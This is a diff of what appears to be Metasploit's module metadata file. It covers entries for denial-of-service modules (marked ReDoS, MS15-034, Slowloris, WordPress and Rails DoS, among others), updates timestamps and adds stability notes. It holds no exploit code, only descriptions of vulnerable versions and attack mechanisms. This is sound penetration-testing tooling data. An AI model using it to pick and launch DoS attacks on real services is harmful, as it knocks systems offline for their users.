- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -14615,7 +14547,7 @@
"Adam Cazzolla, Sonatype Security Research",
"Nick Starke, Sonatype Security Research"
],
- "description": "This module exploits a Regular Expression Denial of Service vulnerability\n in the npm module \"marked\". The vulnerable portion of code that this module\n targets is in the \"heading\" regular expression. Web applications that use\n \"marked\" for generating html from markdown are vulnerable. Versions up to\n 0.4.0 are vulnerable.",
+ "description": "This module exploits a Regular Expression Denial of Service vulnerability\n in the npm module \"marked\". The vulnerable portion of code that this module\n targets is in the \"heading\" regular expression. Web applications that use\n \"marked\" for generating html from markdown are vulnerable. Versions up to\n 0.4.0 are vulnerable.",
"references": [
"URL-https://blog.sonatype.com/cve-2017-17461-vulnerable-or-not",
"CWE-400"
@@ -14639,7 +14571,7 @@
"https"
],
"targets": null,
- "mod_time": "2018-08-16 14:59:32 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/marked_redos.rb",
"is_install_path": true,
"ref_name": "dos/http/marked_redos",
@@ -14647,19 +14579,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/http/metasploit_httphandler_dos": {
"name": "Metasploit HTTP(S) handler DoS",
"fullname": "auxiliary/dos/http/metasploit_httphandler_dos",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2019-09-04",
"type": "auxiliary",
@@ -14667,7 +14600,7 @@
"Jose Garduno, Dreamlab Technologies AG",
"Angelo Seiler, Dreamlab Technologies AG"
],
- "description": "This module exploits the Metasploit HTTP(S) handler by sending\n a specially crafted HTTP request that gets added as a resource handler.\n Resources (which come from the external connections) are evaluated as RegEx\n in the handler server. Specially crafted input can trigger Gentle, Soft and Hard DoS.\n\n Tested against Metasploit 5.0.20.",
+ "description": "This module exploits the Metasploit HTTP(S) handler by sending\n a specially crafted HTTP request that gets added as a resource handler.\n Resources (which come from the external connections) are evaluated as RegEx\n in the handler server. Specially crafted input can trigger Gentle, Soft and Hard DoS.\n\n Tested against Metasploit 5.0.20.",
"references": [
"CVE-2019-5645"
],
@@ -14690,7 +14623,7 @@
"https"
],
"targets": null,
- "mod_time": "2019-12-26 13:31:38 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/metasploit_httphandler_dos",
@@ -14698,26 +14631,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/http/monkey_headers": {
"name": "Monkey HTTPD Header Parsing Denial of Service (DoS)",
"fullname": "auxiliary/dos/http/monkey_headers",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2013-05-30",
"type": "auxiliary",
"author": [
"Doug Prostko "
],
- "description": "This module causes improper header parsing that leads to a segmentation fault\n due to a specially crafted HTTP request. Affects version <= 1.2.0.",
+ "description": "This module causes improper header parsing that leads to a segmentation fault\n due to a specially crafted HTTP request. Affects version <= 1.2.0.",
"references": [
"CVE-2013-3843",
"OSVDB-93853",
@@ -14726,14 +14660,10 @@
"platform": "",
"arch": "",
"rport": 2001,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/monkey_headers.rb",
"is_install_path": true,
"ref_name": "dos/http/monkey_headers",
@@ -14741,19 +14671,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/http/ms15_034_ulonglongadd": {
"name": "MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service",
"fullname": "auxiliary/dos/http/ms15_034_ulonglongadd",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -14761,7 +14692,7 @@
"Bill Finlayson",
"sinn3r "
],
- "description": "This module will check if scanned hosts are vulnerable to CVE-2015-1635 (MS15-034), a\n vulnerability in the HTTP protocol stack (HTTP.sys) that could result in arbitrary code\n execution. This module will try to cause a denial-of-service.",
+ "description": "This module will check if scanned hosts are vulnerable to CVE-2015-1635 (MS15-034), a\n vulnerability in the HTTP protocol stack (HTTP.sys) that could result in arbitrary code\n execution. This module will try to cause a denial-of-service.",
"references": [
"CVE-2015-1635",
"MSB-MS15-034",
@@ -14789,7 +14720,7 @@
"https"
],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb",
"is_install_path": true,
"ref_name": "dos/http/ms15_034_ulonglongadd",
@@ -14797,19 +14728,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/http/nodejs_pipelining": {
"name": "Node.js HTTP Pipelining Denial of Service",
"fullname": "auxiliary/dos/http/nodejs_pipelining",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2013-10-18",
"type": "auxiliary",
@@ -14818,7 +14750,7 @@
"titanous",
"joev "
],
- "description": "This module exploits a Denial of Service (DoS) condition in the HTTP parser of Node.js versions\n released before 0.10.21 and 0.8.26. The attack sends many pipelined\n HTTP requests on a single connection, which causes unbounded memory\n allocation when the client does not read the responses.",
+ "description": "This module exploits a Denial of Service (DoS) condition in the HTTP parser of Node.js versions\n released before 0.10.21 and 0.8.26. The attack sends many pipelined\n HTTP requests on a single connection, which causes unbounded memory\n allocation when the client does not read the responses.",
"references": [
"CVE-2013-4450",
"OSVDB-98724",
@@ -14828,14 +14760,10 @@
"platform": "",
"arch": "",
"rport": 80,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/nodejs_pipelining.rb",
"is_install_path": true,
"ref_name": "dos/http/nodejs_pipelining",
@@ -14843,26 +14771,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/http/novell_file_reporter_heap_bof": {
"name": "NFR Agent Heap Overflow Vulnerability",
"fullname": "auxiliary/dos/http/novell_file_reporter_heap_bof",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2012-11-16",
"type": "auxiliary",
"author": [
"juan vazquez "
],
- "description": "This module exploits a heap overflow in NFRAgent.exe, a component of Novell\n File Reporter (NFR). The vulnerability occurs when handling requests of name \"SRS\",\n where NFRAgent.exe fails to generate a response in a secure way, copying user\n controlled data into a fixed-length buffer in the heap without bounds checking.\n This module has been tested against NFR Agent 1.0.4.3 (File Reporter 1.0.2).",
+ "description": "This module exploits a heap overflow in NFRAgent.exe, a component of Novell\n File Reporter (NFR). The vulnerability occurs when handling requests of name \"SRS\",\n where NFRAgent.exe fails to generate a response in a secure way, copying user\n controlled data into a fixed-length buffer in the heap without bounds checking.\n This module has been tested against NFR Agent 1.0.4.3 (File Reporter 1.0.2).",
"references": [
"CVE-2012-4956",
"URL-https://www.rapid7.com/blog/post/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959/"
@@ -14886,7 +14815,7 @@
"https"
],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb",
"is_install_path": true,
"ref_name": "dos/http/novell_file_reporter_heap_bof",
@@ -14894,19 +14823,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/http/rails_action_view": {
"name": "Ruby on Rails Action View MIME Memory Exhaustion",
"fullname": "auxiliary/dos/http/rails_action_view",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2013-12-04",
"type": "auxiliary",
@@ -14915,7 +14845,7 @@
"joev ",
"sinn3r "
],
- "description": "This module exploits a Denial of Service (DoS) condition in Action View that requires\n a controller action. By sending a specially crafted content-type header to a Rails\n application, it is possible for it to store the invalid MIME type, and may eventually\n consume all memory if enough invalid MIMEs are given.\n\n Versions 3.0.0 and other later versions are affected, fixed in 4.0.2 and 3.2.16.",
+ "description": "This module exploits a Denial of Service (DoS) condition in Action View that requires\n a controller action. By sending a specially crafted content-type header to a Rails\n application, it is possible for it to store the invalid MIME type, and may eventually\n consume all memory if enough invalid MIMEs are given.\n\n Versions 3.0.0 and other later versions are affected, fixed in 4.0.2 and 3.2.16.",
"references": [
"CVE-2013-6414",
"OSVDB-100525",
@@ -14926,14 +14856,10 @@
"platform": "",
"arch": "",
"rport": 80,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/rails_action_view.rb",
"is_install_path": true,
"ref_name": "dos/http/rails_action_view",
@@ -14941,19 +14867,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/http/rails_json_float_dos": {
"name": "Ruby on Rails JSON Processor Floating Point Heap Overflow DoS",
"fullname": "auxiliary/dos/http/rails_json_float_dos",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2013-11-22",
"type": "auxiliary",
@@ -14962,7 +14889,7 @@
"joev ",
"todb "
],
- "description": "When Ruby attempts to convert a string representation of a large floating point\n decimal number to its floating point equivalent, a heap-based buffer overflow\n can be triggered. This module has been tested successfully on a Ruby on Rails application\n using Ruby version 1.9.3-p448 with WebRick and Thin web servers, where the Rails application\n crashes with a segfault error. Other versions of Ruby are reported to be affected.",
+ "description": "When Ruby attempts to convert a string representation of a large floating point\n decimal number to its floating point equivalent, a heap-based buffer overflow\n can be triggered. This module has been tested successfully on a Ruby on Rails application\n using Ruby version 1.9.3-p448 with WebRick and Thin web servers, where the Rails application\n crashes with a segfault error. Other versions of Ruby are reported to be affected.",
"references": [
"CVE-2013-4164",
"OSVDB-100113",
@@ -14987,7 +14914,7 @@
"https"
],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/rails_json_float_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/rails_json_float_dos",
@@ -14995,19 +14922,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/http/slowloris": {
"name": "Slowloris Denial of Service Attack",
"fullname": "auxiliary/dos/http/slowloris",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2009-06-17",
"type": "auxiliary",
@@ -15027,12 +14955,8 @@
"platform": "",
"arch": "",
"rport": 80,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
"mod_time": "2022-01-29 00:51:56 +0000",
"path": "/modules/auxiliary/dos/http/slowloris.py",
@@ -15041,27 +14965,22 @@
"check": false,
"post_auth": false,
"default_credential": false,
- "notes": {
- },
+ "notes": {},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/http/sonicwall_ssl_format": {
"name": "SonicWALL SSL-VPN Format String Vulnerability",
"fullname": "auxiliary/dos/http/sonicwall_ssl_format",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2009-05-29",
"type": "auxiliary",
"author": [
"aushack "
],
- "description": "There is a format string vulnerability within the SonicWALL\n SSL-VPN Appliance - 200, 2000 and 4000 series. Arbitrary memory\n can be read or written to, depending on the format string used.\n There appears to be a length limit of 127 characters of format\n string data. With physical access to the device and debugging,\n this module may be able to be used to execute arbitrary code remotely.",
+ "description": "There is a format string vulnerability within the SonicWALL\n SSL-VPN Appliance - 200, 2000 and 4000 series. Arbitrary memory\n can be read or written to, depending on the format string used.\n There appears to be a length limit of 127 characters of format\n string data. With physical access to the device and debugging,\n this module may be able to be used to execute arbitrary code remotely.",
"references": [
"BID-35145",
"OSVDB-54881",
@@ -15086,7 +15005,7 @@
"https"
],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/sonicwall_ssl_format.rb",
"is_install_path": true,
"ref_name": "dos/http/sonicwall_ssl_format",
@@ -15094,19 +15013,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/http/squid_range_dos": {
"name": "Squid Proxy Range Header DoS",
"fullname": "auxiliary/dos/http/squid_range_dos",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2021-05-27",
"type": "auxiliary",
@@ -15149,9 +15069,7 @@
"Stability": [
"crash-service-down"
],
- "Reliability": [
-
- ],
+ "Reliability": [],
"SideEffects": [
"ioc-in-logs"
]
@@ -15168,9 +15086,7 @@
"auxiliary_dos/http/tautulli_shutdown_exec": {
"name": "Tautulli v2.1.9 - Shutdown Denial of Service",
"fullname": "auxiliary/dos/http/tautulli_shutdown_exec",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -15201,7 +15117,7 @@
"https"
],
"targets": null,
- "mod_time": "2021-08-27 17:15:33 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/tautulli_shutdown_exec.rb",
"is_install_path": true,
"ref_name": "dos/http/tautulli_shutdown_exec",
@@ -15209,19 +15125,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/http/ua_parser_js_redos": {
"name": "ua-parser-js npm module ReDoS",
"fullname": "auxiliary/dos/http/ua_parser_js_redos",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -15254,7 +15171,7 @@
"https"
],
"targets": null,
- "mod_time": "2018-07-12 17:34:52 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/ua_parser_js_redos.rb",
"is_install_path": true,
"ref_name": "dos/http/ua_parser_js_redos",
@@ -15262,19 +15179,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/http/webkitplus": {
"name": "WebKitGTK+ WebKitFaviconDatabase DoS",
"fullname": "auxiliary/dos/http/webkitplus",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2018-06-03",
"type": "auxiliary",
@@ -15294,14 +15212,10 @@
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/webkitplus.rb",
"is_install_path": true,
"ref_name": "dos/http/webkitplus",
@@ -15309,6 +15223,11 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -15322,16 +15241,14 @@
"auxiliary_dos/http/webrick_regex": {
"name": "Ruby WEBrick::HTTP::DefaultFileHandler DoS",
"fullname": "auxiliary/dos/http/webrick_regex",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2008-08-08",
"type": "auxiliary",
"author": [
"kris katterjohn "
],
- "description": "The WEBrick::HTTP::DefaultFileHandler in WEBrick in\n Ruby 1.8.5 and earlier, 1.8.6 to 1.8.6-p286, 1.8.7\n to 1.8.7-p71, and 1.9 to r18423 allows for a DoS\n (CPU consumption) via a crafted HTTP request.",
+ "description": "The WEBrick::HTTP::DefaultFileHandler in WEBrick in\n Ruby 1.8.5 and earlier, 1.8.6 to 1.8.6-p286, 1.8.7\n to 1.8.7-p71, and 1.9 to r18423 allows for a DoS\n (CPU consumption) via a crafted HTTP request.",
"references": [
"BID-30644",
"CVE-2008-3656",
@@ -15357,7 +15274,7 @@
"https"
],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/webrick_regex.rb",
"is_install_path": true,
"ref_name": "dos/http/webrick_regex",
@@ -15365,19 +15282,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/http/wordpress_directory_traversal_dos": {
"name": "WordPress Traversal Directory DoS",
"fullname": "auxiliary/dos/http/wordpress_directory_traversal_dos",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -15385,7 +15303,7 @@
"Yorick Koster",
"CryptisStudents"
],
- "description": "Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin\n function in wp-admin/includes/ajax-actions.php in WordPress before 4.6\n allows remote attackers to hijack the authentication of subscribers\n for /dev/random read operations by leveraging a late call to\n the check_ajax_referer function, a related issue to CVE-2016-6896.",
+ "description": "Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin\n function in wp-admin/includes/ajax-actions.php in WordPress before 4.6\n allows remote attackers to hijack the authentication of subscribers\n for /dev/random read operations by leveraging a late call to\n the check_ajax_referer function, a related issue to CVE-2016-6896.",
"references": [
"CVE-2016-6897",
"EDB-40288",
@@ -15410,7 +15328,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-03-22 12:52:15 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/wordpress_directory_traversal_dos",
@@ -15418,19 +15336,20 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/http/wordpress_long_password_dos": {
"name": "WordPress Long Password DoS",
"fullname": "auxiliary/dos/http/wordpress_long_password_dos",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2014-11-20",
"type": "auxiliary",
@@ -15439,7 +15358,7 @@
"Andres Rojas Guerrero",
"rastating"
],
- "description": "WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x\n before 4.0.1 allows remote attackers to cause a denial of service\n (CPU consumption) via a long password that is improperly handled\n during hashing.",
+ "description": "WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x\n before 4.0.1 allows remote attackers to cause a denial of service\n (CPU consumption) via a long password that is improperly handled\n during hashing.",
"references": [
"CVE-2014-9016",
"URL-https://nvd.nist.gov/vuln/detail/CVE-2014-9034",
@@ -15465,7 +15384,7 @@
"https"
],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/wordpress_long_password_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/wordpress_long_password_dos",
@@ -15473,19 +15392,20 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/http/wordpress_xmlrpc_dos": {
"name": "Wordpress XMLRPC DoS",
"fullname": "auxiliary/dos/http/wordpress_xmlrpc_dos",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2014-08-06",
"type": "auxiliary",
@@ -15493,7 +15413,7 @@
"Nir Goldshlager",
"Christian Mehlmauer "
],
- "description": "Wordpress XMLRPC parsing is vulnerable to a XML based denial of service.\n This vulnerability affects Wordpress 3.5 - 3.9.2 (3.8.4 and 3.7.4 are\n also patched).",
+ "description": "Wordpress XMLRPC parsing is vulnerable to a XML based denial of service.\n This vulnerability affects Wordpress 3.5 - 3.9.2 (3.8.4 and 3.7.4 are\n also patched).",
"references": [
"CVE-2014-5266",
"URL-https://wordpress.org/news/2014/08/wordpress-3-9-2/",
@@ -15521,7 +15441,7 @@
"https"
],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/wordpress_xmlrpc_dos",
@@ -15529,19 +15449,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/http/ws_dos": {
"name": "ws - Denial of Service",
"fullname": "auxiliary/dos/http/ws_dos",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -15557,14 +15478,10 @@
"platform": "",
"arch": "",
"rport": 3000,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-09 00:08:33 +0000",
"path": "/modules/auxiliary/dos/http/ws_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/ws_dos",
@@ -15572,19 +15489,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/mdns/avahi_portzero": {
"name": "Avahi Source Port 0 DoS",
"fullname": "auxiliary/dos/mdns/avahi_portzero",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2008-11-14",
"type": "auxiliary",
@@ -15599,14 +15517,10 @@
"platform": "",
"arch": "",
"rport": 5353,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/mdns/avahi_portzero.rb",
"is_install_path": true,
"ref_name": "dos/mdns/avahi_portzero",
@@ -15614,19 +15528,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/mirageos/qubes_mirage_firewall_dos": {
"name": "Mirage firewall for QubesOS 0.8.0-0.8.3 Denial of Service (DoS) Exploit",
"fullname": "auxiliary/dos/mirageos/qubes_mirage_firewall_dos",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2022-12-04",
"type": "auxiliary",
@@ -15642,12 +15557,8 @@
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
"mod_time": "2023-02-05 12:04:59 +0000",
"path": "/modules/auxiliary/dos/mirageos/qubes_mirage_firewall_dos.rb",
@@ -15660,32 +15571,26 @@
"Stability": [
"crash-service-down"
],
- "Reliability": [
-
- ],
+ "Reliability": [],
"SideEffects": [
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/misc/dopewars": {
"name": "Dopewars Denial of Service",
"fullname": "auxiliary/dos/misc/dopewars",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2009-10-05",
"type": "auxiliary",
"author": [
"Doug Prostko "
],
- "description": "The jet command in Dopewars 1.5.12 is vulnerable to a segmentation fault due to\n a lack of input validation.",
+ "description": "The jet command in Dopewars 1.5.12 is vulnerable to a segmentation fault due to\n a lack of input validation.",
"references": [
"CVE-2009-3591",
"OSVDB-58884",
@@ -15694,14 +15599,10 @@
"platform": "",
"arch": "",
"rport": 7902,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/misc/dopewars.rb",
"is_install_path": true,
"ref_name": "dos/misc/dopewars",
@@ -15709,19 +15610,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/misc/ibm_sametime_webplayer_dos": {
"name": "IBM Lotus Sametime WebPlayer DoS",
"fullname": "auxiliary/dos/misc/ibm_sametime_webplayer_dos",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2013-11-07",
"type": "auxiliary",
@@ -15729,7 +15631,7 @@
"Chris John Riley",
"kicks4kittens"
],
- "description": "This module exploits a known flaw in the IBM Lotus Sametime WebPlayer\n version 8.5.2.1392 (and prior) to cause a denial of service condition\n against specific users. For this module to function the target user\n must be actively logged into the IBM Lotus Sametime server and have\n the Sametime Audio Visual browser plug-in (WebPlayer) loaded as a\n browser extension. The user should have the WebPlayer plug-in active\n (i.e. be in a Sametime Audio/Video meeting for this DoS to work correctly.",
+ "description": "This module exploits a known flaw in the IBM Lotus Sametime WebPlayer\n version 8.5.2.1392 (and prior) to cause a denial of service condition\n against specific users. For this module to function the target user\n must be actively logged into the IBM Lotus Sametime server and have\n the Sametime Audio Visual browser plug-in (WebPlayer) loaded as a\n browser extension. The user should have the WebPlayer plug-in active\n (i.e. be in a Sametime Audio/Video meeting for this DoS to work correctly.",
"references": [
"CVE-2013-3986",
"OSVDB-99552",
@@ -15740,14 +15642,10 @@
"platform": "",
"arch": "",
"rport": 5060,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb",
"is_install_path": true,
"ref_name": "dos/misc/ibm_sametime_webplayer_dos",
@@ -15755,6 +15653,11 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -15772,9 +15675,7 @@
"auxiliary_dos/misc/ibm_tsm_dos": {
"name": "IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service",
"fullname": "auxiliary/dos/misc/ibm_tsm_dos",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2015-12-15",
"type": "auxiliary",
@@ -15790,14 +15691,10 @@
"platform": "",
"arch": "",
"rport": 11460,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
